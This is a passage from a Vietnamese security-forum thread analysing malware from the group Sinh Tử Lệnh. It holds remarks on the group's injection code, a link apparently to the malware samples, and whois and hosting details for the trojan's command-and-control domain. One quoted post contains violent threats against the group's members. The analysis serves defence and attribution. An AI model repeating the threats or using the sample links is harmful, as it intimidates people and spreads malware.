Sao không khai báo constant: g_wszPipeName = L"\\\\.\\pipe\\NannedPipe"; mẹ cho rồi. Bởi vậy em mới nói em mà review code mấy anh thì mấy anh tiêu, bắt viết lại hết nhé.
Còn không thì mai mốt gởi cho em cái lib remote inject code, remote load library, mấy cái hàm decode vớ vẫn đấy (vd như hàm dùng string Microsoft xxxx gì đó) cho em để em review, optimize lại cho nhé. Chứ em RCE code tụi anh tới giờ em ngán tới tận cổ rồi, code duplicate, copy & paste lung tung hết. Bỏ giữa chừng thì anh em HVA buồn, mà viết tiếp thì em ngán quá. Hay là mai mốt tìm đâu được code rootkit đỉnh một chút thì gởi em nhé.

PS: Lúc trước em có gặp thằng GoogleCrashHandler.exe mà theo CMC thì là bot vào VietNamNet, so ra thì code C++của thằng GoogleCrashHandler này cao thủ hơn code của anh em STL này nhiều. Tìm thằng đó mà học hỏi đi nhé !
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 14/06/2011 11:58:20 (+0700) | #77 | 240726
[Avatar]
tranvanminh
HVA Friend

Joined: 04/06/2003 06:36:35
Messages: 516
Location: West coast
Offline
[Profile] [PM]
Khoe một chút: Thấy font và color của OllyDbg em đang dùng đẹp không. Font: Raize, color: Alex Black. 


Đọc mà chỉ buồn cưới smilie
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 15/06/2011 11:49:45 (+0700) | #78 | 240878
hoanganhloc
Elite Member

[Minus]    0    [Plus]
Joined: 05/04/2003 16:47:35
Messages: 28
Offline
[Profile] [PM]

TQN wrote:
Gởi tụi STL:
1. Tụi mày lớn hơn tao không mà xưng anh với tao ?
2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à.
3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm.
4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN.
5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ?
6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày.

Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ?
PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé ! 


Hơi sức đâu mà ông anh nóng giận với mấy chuyện cỏn con đó làm gì?
Em thì xài cái Token Key cho nên mất user và pass của ngân hàng cũng ko thành vấn đề gì. Cái PC của em thì toàn là thông tin vớ vẩn, thêm cái firewall và cái microsoft essential nên em cũng quan tâm lắm tới mấy cái trò vớ vẩn của bọn nhóc STL.
PS: Anh TQN upload ại cho em mấy cái file đó dc ko? Lâu lắm rồi ko tò mò mấy vụ này.. có lẽ em chậm tay hay sao mà MediaFire nó xoá hết rồi...
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 15/06/2011 17:25:35 (+0700) | #79 | 240939
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại.
Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8
2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 15/06/2011 20:57:41 (+0700) | #80 | 240962
[Avatar]
chube
Member

[Minus]    0    [Plus]
Joined: 22/10/2010 02:34:04
Messages: 105
Location: ░░▒▒▓▓██
Offline
[Profile] [PM]
- anh dẫn chuyện hay lắm, em rất thích, và quan trọng là cách anh lồng yếu tố hài hước trong cách anh dẫn chuyện với mấy từ biểu lộ sự khôi hài như "tụi STL" , "Với tool này, STL có giấu file ở đâu đều tìm ra chưa tới nữa giây. "(trích Mỗi tuần 1 tiện ích) mỗi lần đọc em chỉ ôm bụng cười thôi hihi.
.-/ / )
|/ / /
/.' /
// .---.
/ .--._\ Awesome Season to hack :') Dont you think so? xD
/ `--' /
/ .---'
/ .'
/
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 15/06/2011 22:05:15 (+0700) | #81 | 240975
[Avatar]
maclaren
Member

[Minus]    0    [Plus]
Joined: 19/03/2008 11:54:35
Messages: 85
Location: Viet Nam
Offline
[Profile] [PM] [Yahoo!]
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
Ko Biet Thi Dua Cot Ma Nghe.... Cu le te nguoi ta dam cho vo mom !
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 16/06/2011 02:40:37 (+0700) | #82 | 240990
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

TQN wrote:
Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại.
Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8
2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười. 


Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu.

@maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được.

PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 16/06/2011 09:34:00 (+0700) | #83 | 241024
[Avatar]
maclaren
Member

[Minus]    0    [Plus]
Joined: 19/03/2008 11:54:35
Messages: 85
Location: Viet Nam
Offline
[Profile] [PM] [Yahoo!]

conmale wrote:

TQN wrote:
Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại.
Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8
2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười. 


Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu.

@maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được.

PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó. 

à không ! tại vụ STL này mình không biết ? thấy 1 số thông tin hơi củ trên mạng ! mà lại thấy các bác HVA nhà mình đang khuấy nó lên nên cũng tò mò ! định đưa thông tin đó các bác xem thôi ! chứ không có ý gì cả ?
- cho mình hỏi ! theo thông tin trên mạng thì nó lâu rồi. hay giờ STL tái xuất mà các bác lại khuấy ra thế ? mình hơi tò mò thôi smilie
Ko Biet Thi Dua Cot Ma Nghe.... Cu le te nguoi ta dam cho vo mom !
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 16/06/2011 10:12:08 (+0700) | #84 | 241030
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

maclaren wrote:

conmale wrote:

TQN wrote:
Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại.
Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8
2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười. 


Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu.

@maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được.

PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó. 

à không ! tại vụ STL này mình không biết ? thấy 1 số thông tin hơi củ trên mạng ! mà lại thấy các bác HAV nhà mình đang khuấy nó lên nên cũng tò mò ! định đưa thông tin đó các bác xem thôi ! chứ không có ý gì cả ?
- cho mình hỏi ! theo thông tin trên mạng thì nó lâu rồi. hay giờ STL tái xuất mà các bác lại khuấy ra thế ? mình hơi tò mò thôi smilie 


Lạ thật. Bồ là thành viên từ 2008 nhưng vẫn HVA thành HAV là sao cà?

STL chưa bao giờ ngưng hoạt động cho nên không thể "tái xuất".
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 16/06/2011 10:24:44 (+0700) | #85 | 241033
[Avatar]
tranvanminh
HVA Friend

Joined: 04/06/2003 06:36:35
Messages: 516
Location: West coast
Offline
[Profile] [PM]
2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười. 


Dạ, là như anh conmale trình bày, thấy vui với cách hành văn của anh thôi, chứ không phải nói nội dung kỹ thuật của anh buồn cười (mà thật ra là em hoàn toàn không hiểu về kỹ thuật anh viết ) .

Thân mến.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 16/06/2011 11:19:27 (+0700) | #86 | 241042
[Avatar]
maclaren
Member

[Minus]    0    [Plus]
Joined: 19/03/2008 11:54:35
Messages: 85
Location: Viet Nam
Offline
[Profile] [PM] [Yahoo!]
xin lỗi bác conmale và mọi người ! em edit lại rồi ! hì HVA em cứ hay thuận tay là ....tai kỹ thuật typinng của em được có 6 ngón nên smilie
Ko Biet Thi Dua Cot Ma Nghe.... Cu le te nguoi ta dam cho vo mom !
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 16/06/2011 15:57:22 (+0700) | #87 | 241081
thaovn
Elite Member

[Minus]    0    [Plus]
Joined: 21/08/2003 21:10:57
Messages: 16
Offline
[Profile] [PM]
http://www.domaintools.com/research/whois-history/?q=SMARTSHOW.INFO&page=results&submit=Look+up

Các lần change whois info của nó , anh em nào có thẻ tín dụng thì mua cai pro account check giùm sẽ ra chi tiết ! smilie

2007
2007-11-05

2008
2008-04-14
2008-04-27

2010
2010-04-23
2010-06-21
2010-08-10
2010-08-15
2010-10-08
2010-11-30

2011
2011-01-22
2011-03-18
2011-04-20
2011-04-24
2011-05-04
2011-05-20
2011-05-23
2011-05-28
2011-05-29
2011-05-30
2011-05-31
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 17/06/2011 09:25:38 (+0700) | #88 | 241142
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

thaovn wrote:
http://www.domaintools.com/research/whois-history/?q=SMARTSHOW.INFO&page=results&submit=Look+up

Các lần change whois info của nó , anh em nào có thẻ tín dụng thì mua cai pro account check giùm sẽ ra chi tiết ! smilie

2007
2007-11-05

2008
2008-04-14
2008-04-27
.............
2010-04-23

2010-11-30

2011
2011-01-22
2011-03-18
2011-04-20
.........
2011-05-31 


Mua thế nào được cái Pro account. Giá là 10 USD cho 01(một) ngày và chỉ được xem 01(một) domain (whois history) mà thôi. Hì hì

To TQN: anh sẽ post lên các thông tin về SMARTSHOW. INFO ( IP, webserver, Location...). Đã có thông tin từ lâu nhưng bận quá (bận cái vụ Hacker VN vs Hacker Tầu) nên chưa post lên được.
Sorry
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 17/06/2011 13:41:22 (+0700) | #89 | 241194
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

THÔNG TIN VỀ DOMAIN SMARTSHOW.INFO VÀ WEBSERVER HOSTING WEBSITE SMARTSHOW.INFO


Như các bạn đã biết, anh TQN sau khi disassembling các malicious file của nhóm STL đã phát hiện ra
trojan nhúng trong các file này có một service sử dụng để mở một Internet socket kết nối đến một website có tên miền là smartshow.info. Website đóng vai trò tiếp nhận các thông tin mà trojan lấy cắp từ máy nạn nhân, cũng như gửi đến trojan các lệnh (command) mới.

Khi anh TQN phát hiện ra smartshow.info thì website này đã không còn active (hiện diện) trên mạng, cho đến nay. Do vậy không thể biết được trước đó website này được hosting trên webserver nào và đặt ở đâu.

Tuy nhiên bằng một vài kỹ thuật riêng, kèm với đôi chút kinh nghiêm, chúng tôi đã tìm ra IP của webserver trước đó đã hosting website smartshow.info của nhóm STL, cũng như vị trí đặt webserver này.
(Thông tin về webserver chúng tôi tìm ra khoảng nửa ngày sau bài viết công bố tìm thấy tên domain smartshow.info của anh TQN, nhưng giờ mới tiện đăng)

A- Trước hết cập nhật thông tin mới của domain smartshow.info

Ngày hôm nay 17-6-2011 whois information của domain như sau:

Domain IDsmilie32531112-LRMS
Domain Name:SMARTSHOW.INFO
Created On:22-Apr-2010 11:06:53 UTC
Last Updated On:02-Jun-2011 03:00:28 UTC
Expiration Date:22-Apr-2012 11:06:53 UTC
Sponsoring Registrar:OnlineNIC, Inc. (R170-LRMS)
Status:CLIENT HOLD
Status:CLIENT TRANSFER PROHIBITED
Status:PENDING DELETE RESTORABLE
Status:HOLD
Registrant ID:OLNI_196680_0_0
Registrant Name:Domain ID Shield Service
Registrant Organizationsmilieomain ID Shield Service CO., Limited
Registrant Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Registrant Street2:
Registrant Street3:
Registrant City:Hong Kong
Registrant State/Province:Hong Kong
Registrant Postal Code:999077
Registrant Country:CN 


Những điểm chú ý trong information:
1- Địa chỉ người đăng ký domain là ở Kowloon, Hong công. Ở Hồng công có hai khu là khu Hồng công và Kowloon, như trước đây TP HCM có hai khu là Sài gòn và Chợ lớn. Khu Hong công là trung tâm thương mại, hiện đại, còn Kowloon thì cách Hong công một eo biển, là khu kém phát trển hơn, chủ yếu là sản xuất nhỏ, nông nghiệp và sát với Trung hoa lục địa

2- Domain này mua dịch vụ bảo vệ thông tin, nên một số thông tin trên whois đươc giấu, thí dụ địa chỉ email của người sở hữu domain.

3- Điểm quan trong nhất là domain này dù chưa hết hạn nhưng đang bị registrar đưa vào trang thái: PENDING DELETE RESTORABLE
Trang thái (status) này được hiểu là: không đươc cập nhật, thay đổi (update) thông tin của domain trong thời gian tới, ít nhật là trong 40 ngày tới. Sau đó registrar sẽ tiếp tục giữ domain ở trang thai này thêm 30 ngày (và rồi có thể bán lại cho người khác...)

B- Webserver đã từng hosting website smartshow.info

Webserver này có IP tĩnh là 173.45.73.121, computer name (host name) là 79.49.2d.static.xlhost.com. Công ty xlhost.com quản lý webserver này

IP tĩnh nói trên do công ty sau đây quản lý và địa chỉ của nó:

OrgName: eNET Inc. (Tên công ty)
Address: 3000 East Dublin Granville Rd.

City: Columbus

StateProv: OH

PostalCode: 43231

Country: US 


Địa chỉ trên đây (Columbus, OH. USA) cũng chính là địa chỉ địa lý đặt webserver đã từng hosting website smartshow.info của nhóm STL

(Còn tiếp)




The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 17/06/2011 21:52:05 (+0700) | #90 | 241257
[Avatar]
chube
Member

[Minus]    0    [Plus]
Joined: 22/10/2010 02:34:04
Messages: 105
Location: ░░▒▒▓▓██
Offline
[Profile] [PM]
- http://www.malwareurl.com/listing.php?domain=ademuwmaytn.com
- http://ratite.com/whois/whois.cgi?domain=kardjalinews.com
- http://whois.domaintools.com/dochoigiare.com

Anh PXM nghĩ sao về những kết quả này ? còn nhiều link em bắt gặp từ Postal Code đến Address Street y hệt
- Hôm nay em đọc bài này ở đây :

http://www.giaoduc.edu.vn/news/tien-ich-743/hon-200.000-website-mat-tai-khoan-quan-tri-108811.aspx

Đề cập đến NeoSploit Toolkit và Trojan Sinowal , liệu đây có phải là hình thức tấn công mà STL dùng ? Em đợi bài tiếp của anh hihi.
.-/ / )
|/ / /
/.' /
// .---.
/ .--._\ Awesome Season to hack :') Dont you think so? xD
/ `--' /
/ .---'
/ .'
/
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|